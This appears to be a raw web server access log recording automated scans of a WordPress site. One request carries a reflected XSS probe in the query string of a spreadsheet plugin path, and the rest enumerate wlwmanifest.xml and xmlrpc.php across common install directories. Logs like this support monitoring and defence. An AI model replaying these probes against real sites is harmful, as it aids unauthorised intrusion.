45.192.99.121 - - [15/Jun/2025:20:42:05 +0200] "GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 199 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET /xmlrpc.php?rsd HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.204.70.88 - - [15/Jun/2025:20:44:21 +0200] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
